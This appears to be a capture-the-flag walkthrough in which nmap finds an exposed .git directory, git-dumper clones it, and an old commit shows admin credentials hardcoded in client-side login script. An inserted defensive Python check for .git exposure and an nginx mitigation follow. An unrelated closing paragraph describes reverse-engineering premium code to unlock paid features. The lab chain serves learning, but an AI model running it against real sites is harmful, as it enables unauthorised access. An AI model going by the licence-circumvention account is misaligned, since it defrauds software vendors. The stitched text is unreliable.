$ nmap -sCV -Pn -oN nmap.txt [TARGET_IP]
$ cat nmap.txt
Nmap scan report for [TARGET_IP]
Host is up (0.40s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-git:
|   [TARGET_IP]:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 14 22:04:47 2023 -- 1 IP address (1 host up) scanned in 118.95 seconds
Clone the exposed Git directory to the local machine:
$ mkdir git-repo && cd git-repo
$ git-dumper http://10.10.49.172/.git/ .
[-] Testing http://10.10.49.172/.git/HEAD [200]
[-] Testing http://10.10.49.172/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.49.172/.git/ [200]
[-] Fetching http://10.10.49.172/.gitignore [404]
[-] http://10.10.49.172/.gitignore responded with status code 404
[-] Fetching http://10.10.49.172/.git/description [200]
[-] Fetching http://10.10.49.172/.git/index [200]
[-] Fetching http://10.10.49.172/.git/hooks/ [200]
[-] Fetching http://10.10.49.172/.git/refs/ [200]
[-] Fetching http://10.10.49.172/.git/config [200]
[-] Fetching http://10.10.49.172/.git/branches/ [200]
[-] Fetching http://10.10.49.172/.git/HEAD [200]
....
[-] Fetching http://10.10.49.172/.git/logs/refs/heads/master [200]
[-] Running git checkout .
Updated 7 paths from the index
$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

....

commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit
$ git checkout 395e087334d613d5e423cdf8f7be27196a360459
$ ls
README.md  css  dashboard.html  index.html
$ cat index.html
....
<script>
  // Client-side "authentication": the credentials are hardcoded in the page
  // source, and the only session state is a cookie the browser sets for itself.
  function login() {
    let form = document.getElementById("login-form");
    console.log(form.elements);
    let username = form.elements["username"].value;
    let password = form.elements["password"].value;
    if (
      username === "admin" &&
      password === "{{REDACTED}}"
    ) {
      document.cookie = "login=1";
      window.location.href = "/dashboard.html";
    } else {
      document.getElementById("error").innerHTML =
        "INVALID USERNAME OR PASSWORD!";
    }
  }
</script>
</body>
</html>
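The whole chain above starts with one misconfiguration: the deployed web root still contains its .git directory. A defender-side check for that exposure, added here as an example and not part of the original walkthrough, fetches /.git/HEAD and reports a finding only when the body is actually shaped like a Git HEAD file (a "ref:" pointer or a bare object id), which is the same distinction nmap's http-git script makes so that a site answering 200 to every path is not a false positive. The fetch function is injectable so the check runs offline; the host names in the test are constructed.

```python
import re
import urllib.error
import urllib.request
from typing import Callable, Optional, Tuple

# A real .git/HEAD holds either a symbolic ref ("ref: refs/heads/master")
# or, when detached, a bare 40-hex SHA-1 object id.
_HEAD_RE = re.compile(rb"^(ref: refs/[\x21-\x7e]+|[0-9a-f]{40})$")


def looks_like_git_head(body: bytes) -> bool:
    """True only if the response body is shaped like a Git HEAD file."""
    return _HEAD_RE.match(body.strip()) is not None


def default_fetch(url: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """GET url and return (status, first 512 bytes); HTTP errors return their code."""
    req = urllib.request.Request(url, headers={"User-Agent": "git-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(512)
    except urllib.error.HTTPError as err:
        return err.code, b""


def check_git_exposure(
    base_url: str,
    fetch: Callable[[str], Tuple[int, bytes]] = default_fetch,
) -> Optional[str]:
    """Return a finding string if base_url serves its .git metadata, else None.

    A catch-all site that returns 200 for every path is not reported: the body
    must validate as a HEAD file before the check counts it as exposure.
    """
    url = base_url.rstrip("/") + "/.git/HEAD"
    status, body = fetch(url)
    if status != 200 or not looks_like_git_head(body):
        return None
    return f"{url} is readable ({body.strip().decode(errors='replace')})"


# Mitigation for nginx (the server seen in the scan above): deploy the build
# output rather than a repository checkout, and as defence in depth refuse
# dot-git paths in the server block:
#   location ~ /\.git { return 404; }
```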
From one of the open source projects. The developers mistakenly committed the paid services code block to their community edition git repo. I was able to reverse engineer the code block and avail those premium services by making changes to the community edition codebase.